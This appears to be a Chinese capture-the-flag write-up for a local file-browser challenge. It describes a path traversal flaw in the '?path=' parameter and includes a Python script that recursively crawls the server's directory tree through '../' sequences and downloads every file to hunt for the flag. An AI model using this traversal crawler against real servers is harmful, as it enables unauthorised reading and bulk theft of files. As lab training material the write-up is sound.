垫刀之路04_一个文件浏览器
垫刀之路04: 一个文件浏览器
先点一个路径
http://127.0.0.1:7489/?path=/src
?path=
路径遍历漏洞,尝试访问?path=../,可行
输入足够多的../../../可到达根目录
根目录http://127.0.0.1:7489/?path=../../../../
有一个flag
文件内容:
flag 不在这里哦,你可以换个地方找找。
位置不远,耐心一点
flag在127.0.0.1:1943/?path=../../../../tmp/flag
很难找
import os
import requests
from urllib.parse import urljoin
# 初始化基础URL
base_url = 'http://127.0.0.1:1943/?path=../../../..'
# 用于存储已访问的URL,避免重复访问
visited_urls = set()
# 定义一个函数,用于下载文件
def download_file(url, path):
try:
response = requests.get(url, timeout=10) # 设置10秒超时
response.raise_for_status() # 确保请求成功
# 检查响应内容是否为空
if not response.content:
print(f"Warning: Empty content for {url}, skipping download.")
return
# 确保目录存在
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'wb') as f:
f.write(response.content)
print(f"Downloaded {url} to {path}")
except requests.exceptions.Timeout:
print(f"Request timed out for {url}")
except requests.exceptions.RequestException as e:
print(f"An error occurred while downloading {url}: {e}")
# 定义一个函数,用于遍历目录
def traverse(url):
# 避免重复访问
if url in visited_urls:
return
visited_urls.add(url)
try:
response = requests.get(url, timeout=10) # 设置10秒超时
response.raise_for_status() # 确保请求成功
# 解析HTML内容,查找链接
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.text, 'html.parser')
for link in soup.find_all('a', href=True):
# 获取完整的URL
full_url = urljoin(url, link['href'])
# 检查是否为目录
if ' (Directory)' in link.text:
# 递归遍历子目录
traverse(full_url)
else:
# 下载文件
file_url = urljoin(url, link['href'])
file_path = os.path.join('.', os.path.basename(file_url))
download_file(file_url, file_path)
except requests.exceptions.Timeout:
print(f"Request timed out for {url}")
except requests.exceptions.RequestException as e:
print(f"An error occurred while traversing {url}: {e}")
# 开始遍历
traverse(base_url)
运行后,会下载所有文件到当前目录 大概20分钟 下载完查找flag